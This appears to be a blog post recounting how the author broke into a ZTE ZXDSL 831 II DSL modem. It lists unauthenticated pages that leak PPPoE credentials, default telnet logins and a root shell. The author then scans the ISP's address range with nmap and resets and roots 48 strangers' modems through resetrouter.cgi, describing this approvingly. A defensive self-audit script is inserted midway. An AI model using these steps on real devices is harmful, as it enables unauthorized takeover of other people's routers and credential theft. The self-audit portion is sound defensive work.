Here is how it started: I got a new DSL internet modem (ZTE ZXDSL 831 II) and it turned out I had forgotten my password. I couldn't connect to the internet, nor could I go to 192.168.1.1 and change my credentials (it was using Basic authentication over HTTP headers, which could easily be exploited), but I took it as a challenge and tried to get inside so I could keep using my internet.
Turns out I was able to first hack it, root it, hack the people around me (* people using broadband in the country, if you know the IP range), and then write about it.
Since I wasn't able to find a direct way to access the modem using the IP, I started requesting some files... and it turned out most of those files were returned to me without a 401 Unauthorized error (unlike the login page), which is an Insecure Direct Object Reference vulnerability.
Note that, by default, the modem comes with admin:admin credentials, which is awesome for pwning other people who haven't changed the defaults. Unlike those people, I had changed mine, so I had to find another way.
Requesting http://192.168.1.1/upload.cgi didn't throw a 401 error; it just gave the upload page. Insecure Direct Object Reference. Awesome!
Next I found the awesome place: without being authenticated, requesting http://192.168.1.1/pppoe.cgi turns out the PPPoE username and password when you view the source. Shit!
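Added example, not code from the original post: a self-audit you can run against your own modem's LAN address to confirm that the pages the post found open (and any others you add) now demand credentials. The base URL and the fetcher are assumptions; state-changing pages such as resetrouter.cgi are deliberately left out of the default list because a plain GET to them changes the device.

```python
"""Self-audit: confirm every management page on your own modem demands credentials.

Added example, not from the original post. The paths below are the ones the post
names; BASE_URL and the fetcher are assumptions.
"""
import urllib.error
import urllib.request

# Pages the post found readable without authentication. Only read-only pages are
# listed: resetrouter.cgi is omitted on purpose since a GET to it resets the device.
SENSITIVE_PATHS = ["/upload.cgi", "/pppoe.cgi", "/menu_status.html"]


def http_status(url, timeout=5):
    """Status code for an unauthenticated GET (no Authorization header is sent)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code  # urllib raises on 4xx/5xx; the code is what we want


def classify(status):
    """401/403 means auth is enforced; 404 means the page is absent; 2xx/3xx is exposed."""
    if status in (401, 403):
        return "protected"
    if status == 404:
        return "absent"
    return "EXPOSED"


def audit(base_url, paths=SENSITIVE_PATHS, fetch=http_status):
    """Map each path to a verdict. `fetch` is injectable so the check can run offline."""
    return {p: classify(fetch(base_url.rstrip("/") + p)) for p in paths}


def is_locked_down(report):
    """True only if no management page is reachable without credentials."""
    return all(verdict != "EXPOSED" for verdict in report.values())


if __name__ == "__main__":
    # Assumed LAN address of your own device; adjust to match your network.
    report = audit("http://192.168.1.1")
    for path, verdict in report.items():
        print(f"{path:24} {verdict}")
    print("locked down" if is_locked_down(report) else "auth gaps found")
```

A firmware update or configuration change is only a fix if every listed path comes back "protected" (or "absent"); a single "EXPOSED" line means the IDOR is still there.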
Awesome! So I got inside. But that wasn't enough anymore; I wanted something more. Root?
So I port scanned it using nmap -sV 192.168.1.1 and it returned
23/tcp open telnet ZXDSL 831CII ADSL modem telnetd 5.2.0a_E09_ET
So I just did telnet. Since I had reset to defaults, the login was now admin:admin, obviously. So I got inside the modem and had plenty of commands available, but they weren't cool, so I typed "sh", which turned out to be the BusyBox v1.0 built-in shell (since it was running micro_httpd).
# cat /proc/cpuinfo
system type : 96338L-2M-8M
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 239.20
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
unaligned access : 1289794
VCED exceptions : not available
VCEI exceptions : not available
So I did "cat /proc/meminfo" (it holds 6MB), then "cat /proc/version", and it returned
Linux version 126.96.36.199 (email@example.com)
Even though there was a public local exploit for that kernel, simply typing "echo $USER" revealed I was root (I had been root the whole time). No need to root shit. Simple as that.
Going to http://192.168.1.1/menu_status.html gives the public IP address of the modem (aside from lots of easier ways); it was 10.136.0.16.
So I just did "sudo nmap --open -sS -sV -T4 10.136.0.*/24 -p 80 -oG - | grep 'open'"
and figured out at least 48 other modems were online. Then I went to their ip.add.re.ss/resetrouter.cgi and then telnet. Root them! It was a fun time of recovery! Now that I root the router, I can manipulate what goes to my ISP and what doesn't, which is bad for the ISP. :P
Conclusion: ZTE makes bad routers, most running the same services with similar holes. They weren't built with security in mind. Run if you see one! Don't buy it! Sue me!
And yeah, disable remote logins to telnet, http, etc. ;)